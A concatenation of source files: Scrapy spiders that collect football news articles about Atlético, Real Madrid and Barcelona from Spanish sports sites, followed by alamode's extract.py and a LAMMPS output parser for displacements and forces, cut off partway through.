lib.rb_tree_node_dealloc_cb(rb_tree_p, rb_node_p)
def sorted_mapping_eq(map1, map2):
return all(
k1 == k2 and v1 == v2
for (k1, v1), (k2, v2)
in zip(map1.items(), map2.items()))
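# --- Illustrative usage (a sketch; assumes the compiled crbtree._rbtree extension is built) ---
# sd = SortedDict({"b": 2, "a": 1})
# sd["c"] = 3
# list(sd.items())   # -> [('a', 1), ('b', 2), ('c', 3)]  (iteration follows key order)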
``` |
{
"source": "jochoaserna/footballnews",
"score": 3
} |
#### File: scrapy_tfg/spiders/footballnews_spider.py
```python
import scrapy
import re
import json
import urllib.parse
import datetime
import random
class MarcaSpider(scrapy.Spider):
name = "footballnews"
start_urls = [
'http://www.marca.com/futbol/atletico.html',
'http://www.marca.com/futbol/real-madrid.html',
'http://www.marca.com/futbol/barcelona.html',
'http://as.com/tag/atletico_madrid/',
'http://as.com/tag/fc_barcelona/',
'http://as.com/tag/real_madrid/',
'http://www.mundodeportivo.com/futbol/atletico-madrid',
'http://www.mundodeportivo.com/futbol/real-madrid',
'http://www.mundodeportivo.com/futbol/fc-barcelona',
'http://www.sport.es/es/barca/',
'http://www.sport.es/es/real-madrid/'
]
# -------------------------------------------------------------
# NEW COMMANDS
# $ scrapy crawl footballnews -o footballnews.json
# -------------------------------------------------------------
#COMMENT OUT!
# def __init__(self, team='atletico'):
# self.start_urls = ['http://www.marca.com/futbol/%s.html' % team]
#COMMENT OUT!
def parse(self, response):
# follow links to each news item
if bool(re.search("marca.com", response.url)):
for href in response.css('h3.mod-title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news_marca)
elif bool(re.search("as.com", response.url)):
for href in response.css('h2.title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news_as)
elif bool(re.search("mundodeportivo.com/", response.url)):
for href in response.css('h3.story-header-title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news_md)
elif bool(re.search("sport.es", response.url)):
for href in response.css('section.blockpad[data-section="layout-1"] h2.title a::attr(href) ,section.blockpad[data-section="layout-2"] h2.title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news_sport)
def parse_news_marca(self, response):
headline = response.css('h1.js-headline.izquierda::text')[0].extract()
#if len(''.join(response.css('div.row.content.cols-30-70 span.capital-letter::text ,div.row.content.cols-30-70 p::text ,div.row.content.cols-30-70 p strong::text').extract())) < 3896:
#if ''.join(response.css('div.row.content.cols-30-70 span.capital-letter::text ,div.row.content.cols-30-70 p::text ,div.row.content.cols-30-70 p strong::text').extract()) != "":
articleBody = ''.join(response.css('div.row.content.cols-30-70 span.capital-letter::text ,div.row.content.cols-30-70 p::text ,div.row.content.cols-30-70 p strong::text').extract())
#author = response.css('ul.author strong::text')[0].extract()
articleSection = response.css('span.section-type::text')[0].extract()
commentCount = response.css('li.comments-tool strong::text')[0].extract()
datePublishedString = response.css('div.row.content.cols-30-70 time::attr(datetime)')[0].extract()
datePublished = datetime.datetime.strptime(datePublishedString, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S+01:00')
images = response.css('div.row.content.cols-30-70 figure img::attr(src)').extract()
videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
keywords = response.css('ul.item-tags a::text').extract()
comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.date::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("atletico", url)):
team = "atletico"
elif bool(re.search("real-madrid", url)):
team = "madrid"
elif bool(re.search("barcelona", url)):
team = "barca"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
'articleSection':articleSection,
'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
'videos':videos,
'keywords':keywords,
'comments':comments,
'dateCreated':dateCreated,
'newspaper': "marca",
'url': url,
'team': team,
'id':_id
}
yield item
return
def parse_news_as(self, response):
headline = response.css('h1.titular-articulo::text')[0].extract()
#if len(''.join(response.css('div.int-articulo p:not(.txt-art-tags):not(.tit-detalle):not(.fecha-detalle)::text, div.int-articulo p a em::text, div.int-articulo p strong a::text, div.int-articulo p a::text, div.int-articulo p strong::text, div.int-articulo p span::text').extract())) < 3896:
articleBody = ''.join(response.css('div.int-articulo p:not(.txt-art-tags):not(.tit-detalle):not(.fecha-detalle)::text, div.int-articulo p a em::text, div.int-articulo p strong a::text, div.int-articulo p a::text, div.int-articulo p strong::text, div.int-articulo p span::text').extract())
##author = response.css('a.author-pic span::text')[0].extract()
articleSection = response.css('p.subtit-art a::text')[0].extract()
commentCount = response.css('div.contador span::text')[0].extract() #UNSURE
datePublished = response.css('div.art-info time::attr(datetime)')[0].extract()
images = response.css('div.cont-img-dest-art img::attr(src), div.int-articulo p+figure img::attr(src)').extract()
#videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
keywords = response.css('div.cont-art-tags li a::text').extract()
#comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("ATLÉTICO", articleSection)):
team = "atletico"
elif bool(re.search("REAL MADRID", articleSection)):
team = "madrid"
elif bool(re.search("BARCELONA", articleSection)):
team = "barca"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
'articleSection':articleSection,
'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
#'videos':videos,
'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "as",
'url': url,
'team': team,
'id':_id
}
yield item
return
def parse_news_md(self, response):
headline = response.css('h1.story-leaf-title::text')[0].extract()
articleBody = ''.join(response.css('div.story-leaf-txt-p p::text ,div.story-leaf-txt-p p b::text ,div.story-leaf-txt-p p a::text').extract())
#author = response.css('div.story-leaf-author-text span::text')[0].extract()
#articleSection = response.css('span.section-type::text')[0].extract()
#commentCount = response.css('div.fyre-comment-count span::text')[0].extract()
datePublished = response.css('div.story-leaf-body.story-leaf-indent time::attr(datetime)')[0].extract()
images = response.css('div.container figure img::attr(src)')[1].extract()
videos = response.css('div.html-box-center iframe::attr(src)').extract()
keywords = response.css('li.story-leaf-topics-item a::text').extract()
#comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("atletico-madrid", url)):
team = "atletico"
elif bool(re.search("real-madrid", url)):
team = "madrid"
elif bool(re.search("fc-barcelona", url)):
team = "barca"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
#'articleSection':articleSection,
#'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
'videos':videos,
'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "md",
'url': url,
'team': team,
'id':_id
}
yield item
return
def parse_news_sport(self, response):
headline = response.css('header.head h1::text')[0].extract()
articleBody = ''.join(response.css('div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p::text ,div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p a::text ,div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p strong::text').extract())
#author = response.css('div.author div.txt p::text , div.author div.txt a.author-link::text')[0].extract()
articleSection = response.css('p.breadcrumb a::text')[0].extract()
# commentCount = response.css('li.comments-tool strong::text')[0].extract()
datePublishedString = response.css('div.author time::attr(datetime)')[0].extract()
datePublished = datetime.datetime.strptime(datePublishedString, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S+01:00')
images = response.css('div.middle figure img::attr(src)')[0].extract()
# videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
# keywords = response.css('ul.item-tags a::text').extract()
# comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("barca", url)):
team = "barca"
elif bool(re.search("real-madrid", url)):
team = "madrid"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
# "author" COMMENTED BECAUSE IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
'articleSection':articleSection,
#'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
#'videos':videos,
#'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "sport",
'url': url,
'team': team,
'id':_id
}
yield item
return
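# --- Example run (mirrors the command noted at the top of this spider; output name is an example) ---
# $ scrapy crawl footballnews -o footballnews.json
# # every yielded item is a schema.org-style dict (headline, articleBody, datePublished,
# # keywords, newspaper, team, ...) with an id generated from a random int plus dateCreated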
```
#### File: scrapy_tfg/spiders/marca_spider.py
```python
import scrapy
import re
import datetime
import random
class MarcaSpider(scrapy.Spider):
name = "marca"
start_urls = [
'http://www.marca.com/futbol/atletico.html',
'http://www.marca.com/futbol/real-madrid.html',
'http://www.marca.com/futbol/barcelona.html'
]
team = ""
teamsURL = ['atletico','real-madrid', 'barcelona']
teamsParse = ['atletico','madrid', 'barca']
# -------------------------------------------------------------
# COMMANDS
# $ scrapy crawl marca -o marca.json
# -------------------------------------------------------------
def parse(self, response):
# follow links to each news item
for href in response.css('h3.mod-title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news)
def parse_news(self, response):
headline = response.css('h1.js-headline.izquierda::text')[0].extract()
articleBody = ''.join(response.css('div.row.content.cols-30-70 span.capital-letter::text ,div.row.content.cols-30-70 p::text ,div.row.content.cols-30-70 p strong::text').extract())
articleSection = response.css('span.section-type::text')[0].extract()
commentCount = response.css('li.comments-tool strong::text')[0].extract()
datePublishedString = response.css('div.row.content.cols-30-70 time::attr(datetime)')[0].extract()
datePublished = datetime.datetime.strptime(datePublishedString, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S+01:00')
images = response.css('div.row.content.cols-30-70 figure img::attr(src)').extract()
videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
keywords = response.css('ul.item-tags a::text').extract()
comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.date::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
self.team = ""
for indexURL, elemURL in enumerate(self.teamsURL):
if bool(re.search(elemURL, url)):
self.team = self.teamsParse[indexURL]
if self.team == "":
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
'articleSection':articleSection,
'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
'videos':videos,
'keywords':keywords,
'comments':comments,
'dateCreated':dateCreated,
'newspaper': "marca",
'url': url,
'team': self.team,
'id':_id
}
yield item
return
```
#### File: scrapy_tfg/spiders/mdeportivo_spider.py
```python
import scrapy
import re
import json
import urllib.parse
import datetime
import random
class MundodeportivoSpider(scrapy.Spider):
name = "md"
start_urls = [
'http://www.mundodeportivo.com/futbol/atletico-madrid',
'http://www.mundodeportivo.com/futbol/real-madrid',
'http://www.mundodeportivo.com/futbol/fc-barcelona'
]
# -------------------------------------------------------------
# COMMANDS
# $ scrapy crawl md -a team=atletico-madrid -o md-atm.json
# $ scrapy crawl md -a team=real-madrid -o md-rma.json
# $ scrapy crawl md -a team=fc-barcelona -o md-bar.json
# -------------------------------------------------------------
# def __init__(self, team='atletico_madrid'):
# self.start_urls = ['http://www.mundodeportivo.com/futbol/%s' % team]
def parse(self, response):
# follow links to each news item
for href in response.css('h3.story-header-title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news)
def parse_news(self, response):
headline = response.css('h1.story-leaf-title::text')[0].extract()
articleBody = ''.join(response.css('div.story-leaf-txt-p p::text ,div.story-leaf-txt-p p b::text ,div.story-leaf-txt-p p a::text').extract())
#author = response.css('div.story-leaf-author-text span::text')[0].extract()
#articleSection = response.css('span.section-type::text')[0].extract()
#commentCount = response.css('div.fyre-comment-count span::text')[0].extract()
datePublished = response.css('div.story-leaf-body.story-leaf-indent time::attr(datetime)')[0].extract()
images = response.css('div.container figure img::attr(src)')[1].extract()
videos = response.css('div.html-box-center iframe::attr(src)').extract()
keywords = response.css('li.story-leaf-topics-item a::text').extract()
#comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("atletico-madrid", url)):
team = "atletico"
elif bool(re.search("real-madrid", url)):
team = "madrid"
elif bool(re.search("fc-barcelona", url)):
team = "barca"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
                # "author" COMMENTED OUT BECAUSE IT IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
#'articleSection':articleSection,
#'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
'videos':videos,
'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "md",
'url': url,
'team': team,
'id':_id
}
yield item
return
```
#### File: scrapy_tfg/spiders/sport_spider.py
```python
import scrapy
import re
import json
import urllib.parse
import datetime
import random
class SportSpider(scrapy.Spider):
name = "sport"
start_urls = [
'http://www.sport.es/es/barca/',
'http://www.sport.es/es/real-madrid/'
]
# -------------------------------------------------------------
    # COMMANDS
# $ scrapy crawl sport -a team=real-madrid -o sport-rma.json
# $ scrapy crawl sport -a team=barca -o sport-bar.json
# -------------------------------------------------------------
# def __init__(self, team='barca'):
# self.start_urls = ['http://www.sport.es/es/%s/' % team]
def parse(self, response):
# follow links to each news item
for href in response.css('h2.title a::attr(href)').extract():
yield scrapy.Request(href, callback=self.parse_news)
def parse_news(self, response):
headline = response.css('header.head h1::text')[0].extract()
articleBody = ''.join(response.css('div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p::text ,div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p a::text ,div.col-xs-12.col-sm-12.col-md-12.col-lg-12.col p strong::text').extract())
#author = response.css('div.author div.txt p::text , div.author div.txt a.author-link::text')[0].extract()
articleSection = response.css('p.breadcrumb a::text')[0].extract()
# commentCount = response.css('li.comments-tool strong::text')[0].extract()
datePublishedString = response.css('div.author time::attr(datetime)')[0].extract()
datePublished = datetime.datetime.strptime(datePublishedString, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S+01:00')
images = response.css('div.middle figure img::attr(src)')[0].extract()
# videos = response.css('div.row.content.cols-30-70 meta[itemprop="contentURL"]::attr(content)').extract()
# keywords = response.css('ul.item-tags a::text').extract()
# comments = ' - '.join(response.css('div.comentario strong.numero_comentario a::text, div.comentario p.nombre span.nombre_usuario::text, div.comentario p.nombre span.nick::text, div.comentario span.fecha::text, div.comentario span+p::text, div.comentario p.nombre img::attr(src)').extract())
dateCreated = datetime.datetime.now().isoformat()
url = response.url
_id = str(random.randint(0,10000)) + dateCreated
team = ""
if bool(re.search("barca", url)):
team = "barca"
elif bool(re.search("real-madrid", url)):
team = "madrid"
else:
return
item = {'@context':'http://schema.org',
'headline':headline,
'articleBody':articleBody,
                # "author" COMMENTED OUT BECAUSE IT IS MISSING IN SOME ARTICLES AND WE ARE NOT USING IT LATER
#'author':author,
'articleSection':articleSection,
#'commentCount':commentCount,
'datePublished':datePublished,
'images':images,
#'videos':videos,
#'keywords':keywords,
#'comments':comments,
'dateCreated':dateCreated,
'newspaper': "sport",
'url': url,
'team': team,
'id':_id
}
yield item
return
``` |
{
"source": "jochym/alamode",
"score": 2
} |
#### File: alamode/tools/extract.py
```python
from __future__ import print_function
import argparse
from interface.VASP import VaspParser
from interface.QE import QEParser
from interface.xTAPP import XtappParser
from interface.OpenMX import OpenmxParser
from interface.LAMMPS import LammpsParser
parser = argparse.ArgumentParser()
parser.add_argument('--VASP',
metavar='SPOSCAR',
help="VASP POSCAR file with equilibrium atomic \
positions (default: None)")
parser.add_argument('--QE',
metavar='supercell.pw.in',
help="Quantum-ESPRESSO input file with equilibrium\
atomic positions (default: None)")
parser.add_argument('--xTAPP',
metavar='supercell.cg',
help="xTAPP CG file with equilibrium atomic \
positions (default: None)")
parser.add_argument('--LAMMPS',
metavar='supercell.lammps',
help="LAMMPS structure file with equilibrium atomic \
positions (default: None)")
parser.add_argument('--OpenMX',
metavar='supercell.dat',
help="OpenMX dat file with equilibrium atomic \
positions (default: None)")
parser.add_argument('--get',
default="disp-force",
help="specify which quantity to extract. \
Available options are 'disp-force', 'disp', \
'force', 'energy', and 'born'. \
(default: disp-force)")
parser.add_argument('--unit',
action="store",
metavar="OUTPUT_UNIT",
dest="unitname",
default="Rydberg",
help="print atomic displacements and forces in units of UNIT. \
Available options are 'eV', 'Rydberg' (default), and 'Hartree'.")
parser.add_argument('--offset',
help="Specify an output file (either *.xml, *.pw.out, or *.str) of an\
equilibrium structure to subtract residual forces, \
displacements, or energies.")
parser.add_argument('--emin',
default=None,
type=float,
help="Lower bound of the energy filter (eV) used for selecting output structures.\
Available only in the VASP parser.")
parser.add_argument('--emax',
default=None,
type=float,
help="Upper bound of the energy filter (eV) used for selecting output structures.\
Available only in the VASP parser.")
parser.add_argument('target_file', metavar='file_to_parse', type=str, nargs='+',
help="Output file of DFT codes, e.g., vasprun.xml.")
def check_options(args):
# Check the calculator option
conditions = [args.VASP is None,
args.QE is None,
args.xTAPP is None,
args.LAMMPS is None,
args.OpenMX is None]
if conditions.count(True) == len(conditions):
        raise RuntimeError(
            "One of the --VASP, --QE, --xTAPP, --LAMMPS, "
            "or --OpenMX options must be given.")
elif len(conditions) - conditions.count(True) > 1:
raise RuntimeError("Error : --VASP, --QE, --xTAPP, --LAMMPS, and \
--OpenMX cannot be given simultaneously.")
elif args.VASP:
code = "VASP"
file_original = args.VASP
elif args.QE:
code = "QE"
file_original = args.QE
elif args.xTAPP:
code = "xTAPP"
file_original = args.xTAPP
elif args.LAMMPS:
code = "LAMMPS"
file_original = args.LAMMPS
elif args.OpenMX:
code = "OpenMX"
file_original = args.OpenMX
# Check output option
str_get = args.get.lower()
if str_get not in ["disp-force", "disp", "force", "energy", "born", "dielec"]:
        raise RuntimeError("Error: Invalid --get option. Available options are "
                           "'disp-force', 'disp', 'force', 'energy', 'born', and 'dielec'.")
print_disp = False
print_force = False
print_energy = False
print_borninfo = False
if str_get == "disp-force":
print_disp = True
print_force = True
elif str_get == "disp":
print_disp = True
elif str_get == "force":
print_force = True
elif str_get == "energy":
print_energy = True
elif str_get == "born" or str_get == "dielec":
print_borninfo = True
if code != "VASP" and code != "QE":
raise RuntimeError("Sorry, --get born is available only for VASP and QE.")
output_flags = [print_disp, print_force, print_energy, print_borninfo]
# Check unit option
str_unit = args.unitname.lower()
if str_unit in ["ev", "electron_volt"]:
str_unit = "ev"
elif str_unit in ["ry", "ryd", "rydberg"]:
str_unit = "rydberg"
elif str_unit in ["ha", "hartree"]:
str_unit = "hartree"
else:
        print("Error: Invalid unit name : %s" % args.unitname)
        exit(1)
return code, file_original, output_flags, str_unit
def run_parse(args, code, file_original, file_results, output_flags, str_unit):
# Print data
if code == "VASP":
handler = VaspParser()
elif code == "QE":
handler = QEParser()
elif code == "xTAPP":
handler = XtappParser()
elif code == "OpenMX":
handler = OpenmxParser()
elif code == "LAMMPS":
handler = LammpsParser()
handler.parse(file_original, file_results, args.offset,
str_unit, output_flags, args.emin, args.emax)
if __name__ == "__main__":
args = parser.parse_args()
file_results = args.target_file
code, file_original, output_flags, str_unit = check_options(args)
run_parse(args, code, file_original, file_results, output_flags, str_unit)
```
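A minimal sketch of driving this extractor from Python rather than the shell, assuming it is run from the `tools/` directory (so `extract.py` and its `interface` package are importable); the QE file names are placeholders, not files shipped with the repository:

```python
# Hedged usage sketch; equivalent to
#   $ python extract.py --QE supercell.pw.in disp01.pw.out disp02.pw.out
# The input/output file names are placeholders for the user's own calculation.
from extract import parser, check_options, run_parse

args = parser.parse_args(['--QE', 'supercell.pw.in', '--get', 'disp-force',
                          'disp01.pw.out', 'disp02.pw.out'])
code, file_original, output_flags, str_unit = check_options(args)
run_parse(args, code, file_original, args.target_file, output_flags, str_unit)
```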
#### File: tools/interface/LAMMPS.py
```python
import numpy as np
import math
class LammpsParser(object):
def __init__(self):
self._prefix = None
self._lattice_vector = None
self._inverse_lattice_vector = None
self._kd = None
self._charges = None
self._common_settings = None
self._nat = 0
self._x_cartesian = None
self._x_fractional = None
self._counter = 1
self._nzerofills = 0
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
self._force_conversion_factor = 1.0
self._initial_structure_loaded = False
self._print_disp = True
self._print_force = True
self._print_energy = False
self._print_born = False
self._BOHR_TO_ANGSTROM = 0.5291772108
self._RYDBERG_TO_EV = 13.60569253
def load_initial_structure(self, file_in):
lammps_box_params = {}
f = open(file_in, 'r')
f.readline()
common_settings = []
for line in f:
if "Atoms" in line:
break
split_line = line.strip().split()
if len(split_line) % 2 == 0:
for i in range(len(split_line) // 2):
lammps_box_params[split_line[i + len(split_line) // 2]] = float(split_line[i])
common_settings.append(line.rstrip())
atoms = []
for line in f:
if line.strip():
atoms.append(line.rstrip().split())
atoms = np.array(atoms)
nat = len(atoms)
ncols = len(atoms[0, :])
if ncols == 5:
            kd = np.array(atoms[:, 1], dtype=int)
x = np.array(atoms[:, 2:5], dtype=np.float64)
charges = None
elif ncols == 6:
            kd = np.array(atoms[:, 1], dtype=int)
x = np.array(atoms[:, 3:6], dtype=np.float64)
charges = np.array(atoms[:, 2], dtype=np.float64)
self._common_settings = common_settings
self._lattice_vector = self._compute_lattice_vector_from_boxparams(lammps_box_params)
self._inverse_lattice_vector = np.linalg.inv(self._lattice_vector)
self._nat = nat
self._x_cartesian = x
self._x_fractional = self._get_fractional_coordinate(x, self._inverse_lattice_vector)
self._kd = kd
self._charges = charges
self._initial_structure_loaded = True
def generate_structures(self, prefix, header_list, disp_list):
self._set_number_of_zerofill(len(disp_list))
self._prefix = prefix
for header, disp in zip(header_list, disp_list):
self._generate_input(header, disp)
def parse(self, initial_lammps, dump_files, dump_file_offset, str_unit,
output_flags, filter_emin=None, filter_emax=None):
if not self._initial_structure_loaded:
self.load_initial_structure(initial_lammps)
self._set_unit_conversion_factor(str_unit)
self._set_output_flags(output_flags)
if self._print_disp and self._print_force:
self._print_displacements_and_forces(dump_files,
dump_file_offset)
elif self._print_disp:
self._print_displacements(dump_files, dump_file_offset)
elif self._print_force:
self._print_atomicforces(dump_files, dump_file_offset)
def _generate_input(self, header, disp):
filename = self._prefix + str(self._counter).zfill(self._nzerofills) + ".lammps"
f = open(filename, 'w')
f.write("%s\n" % header)
for line in self._common_settings:
f.write("%s\n" % line)
f.write("%s\n\n" % "Atoms")
if self._charges is None:
for i in range(self._nat):
f.write("%5d %3d" % (i + 1, self._kd[i]))
disp_tmp = np.dot(disp[i], self._lattice_vector.transpose())
for j in range(3):
f.write("%20.15f" % (self._x_cartesian[i][j] + disp_tmp[j]))
f.write("\n")
f.write("\n")
else:
for i in range(self._nat):
f.write("%5d %3d %11.6f" % (i + 1, self._kd[i], self._charges[i]))
disp_tmp = np.dot(disp[i], self._lattice_vector.transpose())
for j in range(3):
f.write("%20.15f" % (self._x_cartesian[i][j] + disp_tmp[j]))
f.write("\n")
f.write("\n")
f.close()
self._counter += 1
def _print_displacements_and_forces(self, lammps_files, file_offset):
if file_offset is None:
disp_offset = np.zeros((self._nat, 3))
force_offset = np.zeros((self._nat, 3))
else:
x0_offset, force_offset = self._get_coordinate_and_force_lammps(file_offset)
try:
x0_offset = np.reshape(x0_offset, (self._nat, 3))
force_offset = np.reshape(force_offset, (self._nat, 3))
            except ValueError:
raise RuntimeError("File %s contains too many/few entries" % file_offset)
disp_offset = x0_offset - self._x_cartesian
# Automatic detection of the input format
is_dumped_file = False
f = open(lammps_files[0], 'r')
for line in f:
if "ITEM: TIMESTEP" in line:
is_dumped_file = True
break
f.close()
if is_dumped_file:
# This version supports reading the data from MD trajectory
for search_target in lammps_files:
x, force = self._get_coordinate_and_force_lammps(search_target)
ndata = len(x) // (3 * self._nat)
x = np.reshape(x, (ndata, self._nat, 3))
force = np.reshape(force, (ndata, self._nat, 3))
for idata in range(ndata):
disp = x[idata, :, :] - self._x_cartesian - disp_offset
disp *= self._disp_conversion_factor
f = force[idata, :, :] - force_offset
f *= self._force_conversion_factor
print("# Filename: %s, Snapshot: %d" %
(search_target, idata + 1))
for i in range(self._nat):
print("%20.14f %20.14f %20.14f %20.8E %15.8E %15.8E" % (disp[i, 0],
disp[i, 1],
disp[i, 2],
f[i, 0],
f[i, 1],
f[i, 2]))
else:
raise RuntimeError("Could not find ITEM: TIMESTEP keyword in the dump file %s" % lammps_files[0])
@staticmethod
def _compute_lattice_vector_from_boxparams(box_params):
xlo = box_params['xlo']
xhi = box_params['xhi']
ylo = box_params['ylo']
yhi = box_params['yhi']
zlo = box_params['zlo']
zhi = box_params['zhi']
        # Tilt factors default to zero so that orthogonal boxes do not leave
        # xy/xz/yz undefined below.
        xy = 0.0
        xz = 0.0
        yz = 0.0
        if 'xy' in box_params.keys():
            xy = box_params['xy']
        if 'xz' in box_params.keys():
            xz = box_params['xz']
        if 'yz' in box_params.keys():
            yz = box_params['yz']
lx = xhi - xlo
ly = yhi - ylo
lz = zhi - zlo
a = lx
b = math.sqrt(ly**2 + xy**2)
c = math.sqrt(lz**2 + xz**2 + yz**2)
cosalpha = (xy * xz + ly * yz) / (b * c)
cosbeta = xz / c
cosgamma = xy / b
singamma = math.sqrt(1.0 - cosgamma**2)
lavec = np.zeros((3, 3))
lavec[0, 0] = a
lavec[0, 1] = b * cosgamma
lavec[1, 1] = b * singamma
lavec[0, 2] = c * cosbeta
lavec[1, 2] = c * (cosalpha - cosbeta * cosgamma) / singamma
lavec[2, 2] = c * math.sqrt(1.0 - cosbeta**2 - ((cosalpha - cosbeta * cosgamma) / singamma)**2)
return lavec
@staticmethod
def _get_fractional_coordinate(xc, aa_inv):
if aa_inv is None:
return None
convmat = aa_inv.transpose()
nat, _ = np.shape(xc)
xf = np.zeros((nat, 3))
for i in range(nat):
xf[i] = np.dot(xc[i], convmat)
return xf
def _print_displacements(self, lammps_files, file_offset):
if file_offset is None:
disp_offset = np.zeros((self._nat, 3))
else:
x0_offset, _ = self._get_coordinate_and_force_lammps(file_offset)
nentries = len(x0_offset)
if nentries == 3 * self._nat:
x0_offset = np.reshape(x0_offset, (self._nat, 3))
else:
raise RuntimeError("File %s contains too many/few entries" % file_offset)
disp_offset = x0_offset - self._x_cartesian
# Automatic detection of the input format
is_dumped_file = False
f = open(lammps_files[0], 'r')
for line in f:
if "ITEM: TIMESTEP" in line:
is_dumped_file = True
break
f.close()
if is_dumped_file:
# This version supports reading the data from MD trajectory
for search_target in lammps_files:
x, _ = self._get_coordinate_and_force_lammps(search_target)
ndata = len(x) // (3 * self._nat)
x = np.reshape(x, (ndata, self._nat, 3))
for idata in range(ndata):
disp = x[idata, :, :] - self._x_cartesian - disp_offset
disp *= self._disp_conversion_factor
print("# Filename: %s, Snapshot: %d" %
(search_target, idata + 1))
for i in range(self._nat):
print("%20.14f %20.14f %20.14f" % (disp[i, 0],
disp[i, 1],
disp[i, 2]))
else:
raise RuntimeError("Could not find ITEM: TIMESTEP keyword in the dump file %s" % lammps_files[0])
def _print_atomicforces(self, lammps_files, file_offset):
if file_offset is None:
force_offset = np.zeros((self._nat, 3))
else:
_, force_offset = self._get_coordinate_and_force_lammps(file_offset)
try:
force_offset = np.reshape(force_offset, (self._nat, 3))
            except ValueError:
raise RuntimeError("File %s contains too many position entries" % file_offset)
for search_target in lammps_files:
_, force = self._get_coordinate_and_force_lammps(search_target)
ndata = len(force) // (3 * self._nat)
force = np.reshape(force, (ndata, self._nat, 3))
for idata in range(ndata):
f = force[idata, :, :] - force_offset
f *= self._force_conversion_factor
print("# Filename: %s, Snapshot: %d" %
(search_target, idata + 1))
for i in range(self._nat):
print("%19.11E %19.11E %19.11E" % (f[i][0], f[i][1], f[i][2]))
def _set_unit_conversion_factor(self, str_unit):
if str_unit == "ev":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
elif str_unit == "rydberg":
self._disp_conversion_factor = 1.0 / self._BOHR_TO_ANGSTROM
self._energy_conversion_factor = 1.0 / self._RYDBERG_TO_EV
elif str_unit == "hartree":
